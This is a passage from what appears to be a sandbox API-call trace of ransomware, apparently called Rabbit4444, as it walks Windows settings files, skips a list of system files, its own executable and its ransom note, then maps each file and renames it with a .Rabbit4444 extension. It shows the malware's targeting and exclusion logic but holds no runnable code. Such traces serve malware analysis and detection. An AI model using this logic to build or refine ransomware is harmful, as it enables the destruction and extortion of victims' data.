cFileName="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms", cAlternateFileName="CLBE79~1.SET")) returned 1 [0059.433] lstrcmpiW (lpString1="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.433] lstrcmpiW (lpString1="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.433] lstrcmpiW (lpString1="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.433] lstrcmpiW (lpString1="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms", lpString2=".") returned 1 [0059.433] lstrcmpiW (lpString1="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms", lpString2="..") returned 1 [0059.433] lstrcmpiW (lpString1="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms", lpString2="windows") returned -1 [0059.433] lstrcmpiW (lpString1="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.433] lstrcmpiW (lpString1="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.433] lstrcmpiW (lpString1="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms", lpString2="boot") returned 1 [0059.433] lstrcmpiW (lpString1="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.433] lstrcmpiW (lpString1="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.433] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms" | out: lpString1="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms") returned="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms" [0059.433] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.433] lstrlenW (lpString="Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms") returned 64 [0059.433] lstrlenW (lpString="Rabbit4444") returned 10 [0059.433] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.433] lstrlenW (lpString=".dll") returned 4 [0059.433] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.434] lstrlenW (lpString=".lnk") returned 4 [0059.434] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.434] lstrlenW (lpString=".ini") returned 4 [0059.434] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.434] lstrlenW (lpString=".sys") returned 4 [0059.434] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.434] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bec9e135-14c1-4e00-b5c8-899f26833a5a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.434] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.434] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15074477444) returned 1 [0059.434] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=938) returned 1 [0059.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0059.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0059.434] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0059.435] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0059.436] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.436] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.436] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.436] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.436] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.436] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.437] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15074734812) returned 1 [0059.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0059.437] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0059.437] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.437] CloseHandle (hObject=0x298) returned 1 [0059.437] CloseHandle (hObject=0x278) returned 1 [0059.437] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms.Rabbit4444") returned 192 [0059.437] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bec9e135-14c1-4e00-b5c8-899f26833a5a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bec9e135-14c1-4e00-b5c8-899f26833a5a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.438] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5591a704, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5591a704, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x356, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms", cAlternateFileName="CL2590~1.SET")) returned 1 [0059.438] lstrcmpiW (lpString1="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.438] lstrcmpiW (lpString1="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.438] lstrcmpiW (lpString1="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.438] lstrcmpiW (lpString1="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms", lpString2=".") returned 1 [0059.438] lstrcmpiW (lpString1="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms", lpString2="..") returned 1 [0059.438] lstrcmpiW (lpString1="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms", lpString2="windows") returned -1 [0059.438] lstrcmpiW (lpString1="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.438] lstrcmpiW (lpString1="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.438] lstrcmpiW (lpString1="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms", lpString2="boot") returned 1 [0059.438] lstrcmpiW (lpString1="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.438] lstrcmpiW (lpString1="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.438] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms" | out: lpString1="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms") returned="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms" [0059.438] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.439] lstrlenW (lpString="Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms") returned 64 [0059.439] lstrlenW (lpString="Rabbit4444") returned 10 [0059.439] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.439] lstrlenW (lpString=".dll") returned 4 [0059.439] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.439] lstrlenW (lpString=".lnk") returned 4 [0059.439] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.439] lstrlenW (lpString=".ini") returned 4 [0059.439] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.439] lstrlenW (lpString=".sys") returned 4 [0059.439] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.439] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.439] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.440] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15075028073) returned 1 [0059.440] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=854) returned 1 [0059.440] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.440] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0059.440] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x660, lpName=0x0) returned 0x298 [0059.441] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x660) returned 0x70000 [0059.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.442] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0059.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.442] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0059.442] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.442] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.442] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15075281965) returned 1 [0059.442] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.442] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0059.442] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.442] CloseHandle (hObject=0x298) returned 1 [0059.442] CloseHandle (hObject=0x278) returned 1 [0059.442] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms.Rabbit4444") returned 192 [0059.442] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.447] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x559b3073, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x559b3073, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23078eee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms", cAlternateFileName="CLDC92~1.SET")) returned 1 [0059.447] lstrcmpiW (lpString1="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.447] lstrcmpiW (lpString1="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.447] lstrcmpiW (lpString1="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.447] lstrcmpiW (lpString1="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms", lpString2=".") returned 1 [0059.447] lstrcmpiW (lpString1="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms", lpString2="..") returned 1 [0059.447] lstrcmpiW (lpString1="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms", lpString2="windows") returned -1 [0059.447] lstrcmpiW (lpString1="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.447] lstrcmpiW (lpString1="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.447] lstrcmpiW (lpString1="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms", lpString2="boot") returned 1 [0059.447] lstrcmpiW (lpString1="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.447] lstrcmpiW (lpString1="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.447] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms" | out: lpString1="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms") returned="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms" [0059.447] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.447] lstrlenW (lpString="Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms") returned 64 [0059.447] lstrlenW (lpString="Rabbit4444") returned 10 [0059.447] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.447] lstrlenW (lpString=".dll") returned 4 [0059.447] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.447] lstrlenW (lpString=".lnk") returned 4 [0059.447] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.448] lstrlenW (lpString=".ini") returned 4 [0059.448] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.448] lstrlenW (lpString=".sys") returned 4 [0059.448] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.448] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c16a18a2-dc4f-4b7d-92f1-14c430ad17dc}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.448] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.448] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15075871959) returned 1 [0059.448] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=947) returned 1 [0059.448] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.448] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0059.448] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0059.450] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0059.451] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.451] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.451] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.451] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.451] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15076188537) returned 1 [0059.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.451] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0059.451] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.451] CloseHandle (hObject=0x298) returned 1 [0059.451] CloseHandle (hObject=0x278) returned 1 [0059.451] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms.Rabbit4444") returned 192 [0059.452] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c16a18a2-dc4f-4b7d-92f1-14c430ad17dc}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{c16a18a2-dc4f-4b7d-92f1-14c430ad17dc}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.452] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55abe088, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x55abe088, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms", cAlternateFileName="CLC9CC~1.SET")) returned 1 [0059.452] lstrcmpiW (lpString1="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.452] lstrcmpiW (lpString1="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.452] lstrcmpiW (lpString1="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.452] lstrcmpiW (lpString1="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms", lpString2=".") returned 1 [0059.452] lstrcmpiW (lpString1="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms", lpString2="..") returned 1 [0059.452] lstrcmpiW (lpString1="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms", lpString2="windows") returned -1 [0059.452] lstrcmpiW (lpString1="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.453] lstrcmpiW (lpString1="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.453] lstrcmpiW (lpString1="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms", lpString2="boot") returned 1 [0059.453] lstrcmpiW (lpString1="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.453] lstrcmpiW (lpString1="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.453] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms" | out: lpString1="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms") returned="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms" [0059.453] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.453] lstrlenW (lpString="Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms") returned 64 [0059.453] lstrlenW (lpString="Rabbit4444") returned 10 [0059.453] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.453] lstrlenW (lpString=".dll") returned 4 [0059.453] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.453] lstrlenW (lpString=".lnk") returned 4 [0059.453] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.453] lstrlenW (lpString=".ini") returned 4 [0059.453] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.453] lstrlenW (lpString=".sys") returned 4 [0059.453] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.453] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms" (normalized: 